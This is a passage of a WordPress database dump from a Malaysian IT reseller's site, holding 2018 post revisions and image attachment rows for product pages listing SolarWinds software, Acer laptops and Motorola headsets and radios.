SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Access Rights Manager</strong></li>\r\n</ol>\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/access-rights-manager/images/arm-risk-assessment-dashboard.ashx?rev=2f73a141c33344a7b780abb5a13ad26f&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=000BD514503D567C4481CA71A9EFD3C6FD0E7B1F\" width=\"438\" height=\"274\" />\r\n\r\nManage and audit access rights across your IT infrastructure.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitoring of Active Directory</li>\r\n 	<li>Auditing for Windows File Share</li>\r\n 	<li>Monitoring of Microsoft Exchange</li>\r\n 	<li>SharePoint access monitoring and management</li>\r\n 	<li>User provisioning and management</li>\r\n 	<li>User permissions analysis</li>\r\n</ul>\r\n2.Â <strong>Threat Monitor - IT Ops Edition</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/threat-monitor/images/product-screenshots/tm-dashboard.ashx?rev=2509e2d030f545cd84c4a9a9eb97cf9e&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=B935DE922720FDB2068066F71024583290FC93E5\" alt=\"Threat Monitor Dashboard\" width=\"438\" height=\"274\" />\r\n\r\nMonitor, respond, and report security threats in near real time.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Continuously updated threat intelligence</li>\r\n 	<li>Security Information and Event Manager (SIEM)</li>\r\n 	<li>Log correlation</li>\r\n 	<li>Log event archive</li>\r\n 	<li>Network and Host Intrusion Detection System</li>\r\n 	<li>Highly indexed log search capabilities</li>\r\n</ul>\r\n3.Â <strong>Log &amp; Event Manager</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/log-event-manager/images/product-screenshots/lem-ndepth-dashboard.ashx?rev=dbae9befee8e4c00ad5864e02c672369&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=3505668DCBCC2F8656316BD24B2C27AB7FC2BF49\" width=\"442\" height=\"276\" />\r\n\r\nSIEM tools make it easier to use event logs for security, compliance, and troubleshooting.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Integrated compliance reporting tools</li>\r\n 	<li>Event-time correlation of security events</li>\r\n 	<li>Automated threat remediation</li>\r\n 	<li>Advanced search and forensic analysis</li>\r\n 	<li>File integrity monitoring</li>\r\n 	<li>USB device monitoring</li>\r\n</ul>\r\n4.Â <strong>Serv-U File Transfer Protocol Server</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/serv-u-ftp-server/images/product-screenshots/ftp-file-transfer-administration.ashx?rev=2cad58ffcc1e400aa7c851643cb032f1&amp;vs=1&amp;h=640&amp;w=1024&amp;la=en&amp;hash=19E0591A20E78665795CAE302709602B247203D4\" width=\"439\" height=\"274\" />\r\n\r\nSimple, affordable, easy-to-use FTP server software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>File transfer using FTP and FTPS</li>\r\n 	<li>Quick and easy file transfers from the web and mobile devices</li>\r\n 	<li>Transfer multiple and large files easily</li>\r\n 	<li>Simple file transfer administration and management</li>\r\n 	<li>Secure gateway helps avoid data at rest in DMZ networks</li>\r\n 	<li>Easily manage file transfer settings and permissions</li>\r\n</ul>\r\n5.Â <strong>Patch Manager</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/patch-manager/images/product-screenshots/pm_summary.ashx?rev=044b77bd7521417191d7a1cfe8625443&amp;vs=1&amp;h=540&amp;w=713&amp;la=en&amp;hash=62BF688E1480427204B4D19FD633407F8A3D9CE5\" width=\"439\" height=\"332\" />\r\n\r\nPatch management software designed for quickly addressing software vulnerabilities.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Microsoft WSUS patch management</li>\r\n 	<li>Integrations with SCCM</li>\r\n 	<li>Vulnerability management</li>\r\n 	<li>Pre-built/pre-tested packages</li>\r\n 	<li>Patch compliance reports</li>\r\n 	<li>Patch status dashboard</li>\r\n</ul>\r\n6.Â <strong>Serv-U Managed File Transfer Server</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/serv-u-managed-file-transfer-server/images/product-screenshots/mft-secure-file-transfer.ashx?rev=f515b293573c4525b3e5f29f35f51b3b&amp;vs=1&amp;h=640&amp;w=1024&amp;la=en&amp;hash=557EED36DABD7B6D1FBF7705561627428D3B874C\" width=\"442\" height=\"277\" />\r\n\r\nEnhance security and control over file transfers in and outside your organization.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Reliable FTP server software for secure file transfer</li>\r\n 	<li>Ad hoc file sharing to easily send and request files</li>\r\n 	<li>Anywhere, anytime file transfer from web and mobile devices</li>\r\n 	<li>Upload and download large files quickly and easily</li>\r\n 	<li>Centralized file transfer management and automation</li>\r\n 	<li>Maintain regulatory compliance</li>\r\n</ul>\r\n<h3>IT HELP DESK</h3>\r\n<ol>\r\n 	<li><strong>Web Help Desk</strong></li>\r\n</ol>\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/web-help-desk/images/product-screenshots/whd-free-help-desk-ticketing-report.ashx?rev=2d07a68cbca2446da88868070a059aff&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=394D9427D4381D56D611A0F2006E8AA02BB7BBEC\" alt=\"Free ticketing system and performance report management software\" width=\"440\" height=\"275\" />\r\n\r\nAffordable Help Desk Ticketing and Asset Management Software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automate ticketing management</li>\r\n 	<li>Centralize your knowledge management</li>\r\n 	<li>Meet your SLAs</li>\r\n 	<li>Relational ticket association to simplify project and task management</li>\r\n 	<li>Native integration with Active Directory and LDAP</li>\r\n 	<li>Measure customer satisfaction</li>\r\n</ul>\r\n2.Â <strong>Dameware Remote Support</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/dameware-remote-support/images/product-screenshots/drs-windows-management.ashx?rev=cc12df4afcde474294fdf5fb6d56a4b9&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=636F419AC7E5761113D497AFF94FA1D7F7F6357C\" width=\"442\" height=\"276\" />\r\n\r\nRemote control and systems management tools in one easy-to-use package.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Fast and secure remote control</li>\r\n 	<li>Anywhere, anytime remote assistance</li>\r\n 	<li>Simplify Windows administration</li>\r\n 	<li>Built-in remote admin tools</li>\r\n 	<li>Deliver remote support from iOS and Android devices</li>\r\n 	<li>Remotely manage Active Directory environments</li>\r\n</ul>\r\n3.Â <strong>Dameware Mini Remote Control</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/dameware-mini-remote-control/images/product-screenshots/mrc-user-access.ashx?rev=5d73884cd695493e8942cc8f18587258&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=EA52B134665A2E57EB7BABDD7CB818DDC4E704D8\" width=\"441\" height=\"276\" />\r\n\r\nAffordable remote control software for all your customer support and help desk needs.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-platform desktop sharing and remote control</li>\r\n 	<li>Remote access to sleeping and powered-off computers</li>\r\n 	<li>Multi-factor authentication</li>\r\n 	<li>Flexible user access control</li>\r\n 	<li>Customize and automatically deploy remote control agents</li>\r\n 	<li>Remote session tools and utilities</li>\r\n</ul>\r\n4.Â <strong>Mobile Admin</strong>\r\n\r\n<img class=\"\" src=\"https://www.solarwinds.com/-/media/solarwinds/swdcv2/licensed-products/mobile-admin/images/product-screenshots/ma-solarwinds-mobile-top-10.ashx?rev=87b3e3afde674a7c88461cbeb3655d2c&amp;vs=1&amp;h=405&amp;w=648&amp;la=en&amp;hash=4542CAAD5F2942C42FA3A74309D982EB5EBF39DB\" alt=\"Mobile Admin Top 10\" width=\"439\" height=\"274\" />\r\n\r\nGet help simplifying IT administration and management from your mobile device.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>SolarWinds OrionÂ® Platform integration</li>\r\n 	<li>Active Directory</li>\r\n 	<li>Virtualization management</li>\r\n 	<li>Email server management</li>\r\n 	<li>Backup management</li>\r\n 	<li>Remote access</li>\r\n</ul>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Solarwinds','','inherit','closed','closed','','1597-revision-v1','','','2018-12-17 15:37:21','2018-12-17 07:37:21','',1597,'https://bintara.com.my/blog/2018/12/17/1597-revision-v1/',0,'revision','',0),(2306,1,'2018-12-17 16:37:55','2018-12-17 08:37:55','','Swift_7_Ale_preview','','inherit','closed','closed','','swift_7_ale_preview','','','2018-12-17 16:37:55','2018-12-17 08:37:55','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview.png',0,'attachment','image/png',0),(2307,1,'2018-12-17 16:49:34','2018-12-17 08:49:34','','Acer-Spin-1-SP111-34N-preview','','inherit','closed','closed','','acer-spin-1-sp111-34n-preview','','','2018-12-17 16:49:34','2018-12-17 08:49:34','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview.png',0,'attachment','image/png',0),(2308,1,'2018-12-17 16:50:00','2018-12-17 08:50:00','','acer-spin-3-SP314-52-gray-preview','','inherit','closed','closed','','acer-spin-3-sp314-52-gray-preview','','','2018-12-17 16:50:00','2018-12-17 08:50:00','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview.png',0,'attachment','image/png',0),(2309,1,'2018-12-17 16:50:26','2018-12-17 08:50:26','','Spin-5-SP515_preview','','inherit','closed','closed','','spin-5-sp515_preview','','','2018-12-17 16:50:26','2018-12-17 08:50:26','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview.png',0,'attachment','image/png',0),(2310,1,'2018-12-17 16:51:35','2018-12-17 08:51:35','','Acer_Switch_Alpha_12_SA5-271-preview','','inherit','closed','closed','','acer_switch_alpha_12_sa5-271-preview','','','2018-12-17 16:51:35','2018-12-17 08:51:35','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview.png',0,'attachment','image/png',0),(2311,1,'2018-12-17 17:07:47','2018-12-17 09:07:47','','Acer-Chromebook-Tab-10-D651N-preview','','inherit','closed','closed','','acer-chromebook-tab-10-d651n-preview','','','2018-12-17 17:07:47','2018-12-17 09:07:47','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png',0,'attachment','image/png',0),(2378,1,'2018-12-18 18:44:03','2018-12-18 10:44:03','','H525 Motorola','','inherit','closed','closed','','h525-motorola','','','2018-12-18 18:44:03','2018-12-18 10:44:03','',1550,'https://bintara.com.my/wp-content/uploads/2018/12/H525-Motorola.png',0,'attachment','image/png',0),(2312,1,'2018-12-17 17:08:15','2018-12-17 09:08:15','','Chromebook-R-13_preview','','inherit','closed','closed','','chromebook-r-13_preview','','','2018-12-17 17:08:15','2018-12-17 09:08:15','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png',0,'attachment','image/png',0),(2315,1,'2018-12-17 17:09:53','2018-12-17 09:09:53','','C730-nontouch-sku-preview','','inherit','closed','closed','','c730-nontouch-sku-preview','','','2018-12-17 17:09:53','2018-12-17 09:09:53','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png',0,'attachment','image/png',0),(2313,1,'2018-12-17 17:08:43','2018-12-17 09:08:43','','Chromebook_14-sku-preview','','inherit','closed','closed','','chromebook_14-sku-preview','','','2018-12-17 17:08:43','2018-12-17 09:08:43','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png',0,'attachment','image/png',0),(2314,1,'2018-12-17 17:09:18','2018-12-17 09:09:18','','Acer_CP5-471_black-sku-preview','','inherit','closed','closed','','acer_cp5-471_black-sku-preview','','','2018-12-17 17:09:18','2018-12-17 09:09:18','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png',0,'attachment','image/png',0),(2316,1,'2018-12-17 17:10:33','2018-12-17 09:10:33','','AcerChromebookR11_C738T_black-sku-preview','','inherit','closed','closed','','acerchromebookr11_c738t_black-sku-preview','','','2018-12-17 17:10:33','2018-12-17 09:10:33','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png',0,'attachment','image/png',0),(2317,1,'2018-12-17 17:11:18','2018-12-17 09:11:18','','Chromebook 11 N7_preview','','inherit','closed','closed','','chromebook-11-n7_preview','','','2018-12-17 17:11:18','2018-12-17 09:11:18','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview.png',0,'attachment','image/png',0),(2318,1,'2018-12-17 17:18:38','2018-12-17 09:18:38','<h3>Business Product Solution</h3>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSpin 1</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSpin 3</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSpin 5 Pro</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n\r\nAcer Chrome Tab 10</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n\r\nAcer Chromebook R13</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n\r\nAcer Chromebook 14</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n\r\nAcer Chromebook 14 for Work</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n\r\nAcer Chromebook 11 C730</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n\r\nAcer Chromebook R 11 C738T</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-2317\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview.png\" alt=\"\" width=\"474\" height=\"351\" /></p>\r\nAcer Chromebook 11 N7</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2018-12-17 17:18:38','2018-12-17 09:18:38','',1430,'https://bintara.com.my/blog/2018/12/17/1430-revision-v1/',0,'revision','',0),(2373,1,'2018-12-18 16:35:07','2018-12-18 08:35:07','<h2>BLUETOOTH HEADSETS</h2>\r\n<table style=\"height: 335px;\" width=\"800\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/7686-sm.png\" alt=\"HZ800\" />\r\n<p style=\"text-align: center;\"><strong>HZ800</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/5800-sm.png\" alt=\"S305\" />\r\n<p style=\"text-align: center;\"><strong>S305</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/6654-sm.png\" alt=\"H525\" />\r\n<p style=\"text-align: center;\"><strong>H525</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/7317-sm.png\" alt=\"H720\" />\r\n<p style=\"text-align: center;\"><strong>H720</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/7687-sm.png\" alt=\"H730\" />\r\n<p style=\"text-align: center;\"><strong>H730</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/6625-sm.png\" alt=\"H790\" />\r\n<p style=\"text-align: center;\"><strong>H790</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/7707-sm.png\" alt=\"HK100\" />\r\n<p style=\"text-align: center;\"><strong>HK100</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/7393-sm.png\" alt=\"HK200 / HK201 / HK202\" />\r\n<p style=\"text-align: center;\"><strong>HK200 / HK201 / HK202</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/7761-sm.png\" alt=\"HX520\" />\r\n<p style=\"text-align: center;\"><strong>HX520</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/8116-sm.png\" alt=\"HX550\" />\r\n<p style=\"text-align: center;\"><strong>HX550</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/8257-sm.png\" alt=\"HZ720\" />\r\n<p style=\"text-align: center;\"><strong>HZ720</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://motorola-mobility-en-xp.custhelp.com/euf/assets/images/ProdImages/7709-sm.png\" alt=\"S10 HD\" />\r\n<p style=\"text-align: center;\"><strong>S10 HD</strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>WALKIE TALKIE</h2>\r\n<table style=\"height: 358px;\" width=\"997\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://media.rs-online.com/t_large/R1240925-01.jpg\" alt=\"Main Product\" />\r\n<p style=\"text-align: center;\"><strong>Motorola XT180 Walkie Talkies &amp; 2 Way Radios</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://www.trekkinn.com/f/13702/137020421/motorola-tlkr-t61-2-pack.jpg\" alt=\"Motorola TLKR-T61 2 Pack\" width=\"177\" height=\"177\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola TLKR-T61 2 Pack</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://storage.googleapis.com/eezee-product-images/6tnTsXI3pR1SwNj3i5Ew4z.jpg\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Walkie Talkie TLKR T60Z (2 Handsets)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://www.waveinn.com/f/13698/136980480/motorola-tlkr-t41.jpg\" alt=\"Motorola TLKR-T41\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola TLKR-T41</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://encrypted-tbn2.gstatic.com/shopping?q=tbn:ANd9GcQDWgJTLdCc-3WvKFhjv7W05d9IrI5WuWHG9lRqtHxMsoGR1HB9G44yAORFFmEz63lX13qTUUWP_P1JKPToq4bnYNbMiqq_KVVzpmC1YoVSXZpqcSJpie707Q&amp;usqp=CAY\" width=\"153\" height=\"153\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Walkie Talkie TLKR t40</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://images-na.ssl-images-amazon.com/images/I/419frPY61mL.jpg\" width=\"221\" height=\"166\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola T260 Rechargeable Two-Way Radios</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"100\"><img class=\"aligncenter\" src=\"https://images-na.ssl-images-amazon.com/images/I/51u373a-pwL.jpg\" />\r\n<p style=\"text-align: center;\"><strong>Motorola Talkabout T465 Rechargeable Two-Way Radio BundleÂ </strong></p>\r\n</td>\r\n<td width=\"100\"><img src=\"http://www.ashtac.com/wp-content/uploads/2014/08/GP328-427x427.png\" alt=\"GP328\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola GP328</strong></p>\r\n</td>\r\n<td width=\"100\"><img src=\"http://www.ashtac.com/wp-content/uploads/2017/04/8600.png\" alt=\"8600\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR E8600 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img src=\"http://www.ashtac.com/wp-content/uploads/2014/09/Q_P6600-700x700-427x427.jpg\" alt=\"Q_P6600-700x700\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P6600 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img src=\"http://www.ashtac.com/wp-content/uploads/2017/04/p6620.png\" alt=\"p6620\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P6620 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img src=\"http://www.ashtac.com/wp-content/uploads/2017/04/xir_p3688_lg.jpg\" alt=\"xir_p3688_lg\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P3688 Digital)</strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[maxbutton id=\"1\" ]','Motorola','','inherit','closed','closed','','1550-revision-v1','','','2018-12-18 16:35:07','2018-12-18 08:35:07','',1550,'https://bintara.com.my/blog/2018/12/18/1550-revision-v1/',0,'revision','',0),(2319,1,'2018-12-17 17:23:08','2018-12-17 09:23:08','','TM-Spin-B118_preview','','inherit','closed','closed','','tm-spin-b118_preview','','','2018-12-17 17:23:08','2018-12-17 09:23:08','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview.png',0,'attachment','image/png',0),(2320,1,'2018-12-17 17:26:23','2018-12-17 09:26:23','','TravelMate-P246M-sku-preview','','inherit','closed','closed','','travelmate-p246m-sku-preview','','','2018-12-17 17:26:23','2018-12-17 09:26:23','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png',0,'attachment','image/png',0),(2321,1,'2018-12-17 17:26:53','2018-12-17 09:26:53','','TMP4-product-series-preview','','inherit','closed','closed','','tmp4-product-series-preview','','','2018-12-17 17:26:53','2018-12-17 09:26:53','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png',0,'attachment','image/png',0),(2322,1,'2018-12-17 17:27:22','2018-12-17 09:27:22','','TravelMate-P658-preview','','inherit','closed','closed','','travelmate-p658-preview','','','2018-12-17 17:27:22','2018-12-17 09:27:22','',1430,'https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png',0,'attachment','image/png',0),(2323,1,'2018-12-17 17:27:49','2018-12-17 09:27:49','<h3>Business Product Solution</h3>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" 